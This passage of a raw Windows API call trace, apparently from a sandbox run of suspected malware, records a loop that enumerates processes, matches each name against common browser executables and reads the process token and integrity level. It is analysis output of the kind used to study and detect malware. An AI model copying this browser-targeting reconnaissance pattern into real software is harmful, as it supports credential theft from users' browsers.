ReturnLength=0x4bfd38) returned 1 [0229.102] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.103] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.103] CloseHandle (hObject=0xb8) returned 1 [0229.103] CloseHandle (hObject=0xb4) returned 1 [0229.103] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0229.103] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0229.103] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0229.103] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0229.103] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0229.103] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0229.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0229.103] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.103] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.103] GetLastError () returned 0x7a [0229.103] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.103] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.103] CloseHandle (hObject=0xb8) returned 1 [0229.103] CloseHandle (hObject=0xb4) returned 1 [0229.103] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0229.103] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166e70, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.103] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.103] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.103] GetLastError () returned 0x7a [0229.103] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.103] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.103] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.104] CloseHandle (hObject=0xb8) returned 1 [0229.104] CloseHandle (hObject=0xb4) returned 1 [0229.104] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0229.104] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0229.104] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0229.104] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0229.104] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0229.104] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0229.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0229.104] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.104] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.104] GetLastError () returned 0x7a [0229.104] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.104] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.104] CloseHandle (hObject=0xb8) returned 1 [0229.104] CloseHandle (hObject=0xb4) returned 1 [0229.104] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0229.104] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166fa8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.104] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.104] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.104] GetLastError () returned 0x7a [0229.104] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.104] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.104] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.105] CloseHandle (hObject=0xb8) returned 1 [0229.105] CloseHandle (hObject=0xb4) returned 1 [0229.105] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0229.105] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0229.105] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0229.105] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0229.105] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0229.105] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0229.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0229.105] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.105] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.105] GetLastError () returned 0x7a [0229.105] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.105] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.105] CloseHandle (hObject=0xb8) returned 1 [0229.105] CloseHandle (hObject=0xb4) returned 1 [0229.105] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0229.105] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1670b8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.105] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.105] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.105] GetLastError () returned 0x7a [0229.105] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.105] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.105] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.105] CloseHandle (hObject=0xb8) returned 1 [0229.106] CloseHandle (hObject=0xb4) returned 1 [0229.106] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0229.106] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0229.106] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0229.106] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0229.106] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0229.106] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0229.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0229.106] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.106] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.106] GetLastError () returned 0x7a [0229.106] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.106] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.106] CloseHandle (hObject=0xb8) returned 1 [0229.106] CloseHandle (hObject=0xb4) returned 1 [0229.106] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0229.106] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1671f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.106] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.106] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.106] GetLastError () returned 0x7a [0229.106] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.106] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.106] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.106] CloseHandle (hObject=0xb8) returned 1 [0229.107] CloseHandle (hObject=0xb4) returned 1 [0229.107] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0229.107] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0229.107] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0229.107] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0229.107] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0229.107] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0229.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0229.107] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.107] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.107] GetLastError () returned 0x7a [0229.107] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.107] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.107] CloseHandle (hObject=0xb8) returned 1 [0229.107] CloseHandle (hObject=0xb4) returned 1 [0229.107] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0229.107] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167320, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.107] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.107] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.107] GetLastError () returned 0x7a [0229.107] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.107] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.107] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.107] CloseHandle (hObject=0xb8) returned 1 [0229.107] CloseHandle (hObject=0xb4) returned 1 [0229.108] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0229.108] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0229.108] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0229.108] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0229.108] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0229.108] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0229.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0229.108] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.108] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.108] GetLastError () returned 0x7a [0229.108] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.108] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.108] CloseHandle (hObject=0xb8) returned 1 [0229.108] CloseHandle (hObject=0xb4) returned 1 [0229.108] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0229.108] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167460, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.108] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.108] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.108] GetLastError () returned 0x7a [0229.108] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.108] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.108] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.108] CloseHandle (hObject=0xb8) returned 1 [0229.116] CloseHandle (hObject=0xb4) returned 1 [0229.116] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0229.116] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0229.116] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0229.116] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0229.116] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0229.116] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0229.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0229.116] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.116] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0229.116] GetLastError () returned 0x7a [0229.116] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0229.116] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0229.116] CloseHandle (hObject=0xb8) returned 1 [0229.116] CloseHandle (hObject=0xb4) returned 1 [0229.116] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0229.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0229.117] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167578, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.117] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0229.117] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0229.117] GetLastError () returned 0x7a [0229.117] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0229.117] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0229.117] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0229.117] CloseHandle (hObject=0xb8) returned 1 [0229.117] CloseHandle (hObject=0xb4) returned 1 [0229.117] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0229.117] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0229.117] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0229.117] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0229.117] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0229.117] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0229.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0229.117] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0229.117] GetTokenInformation 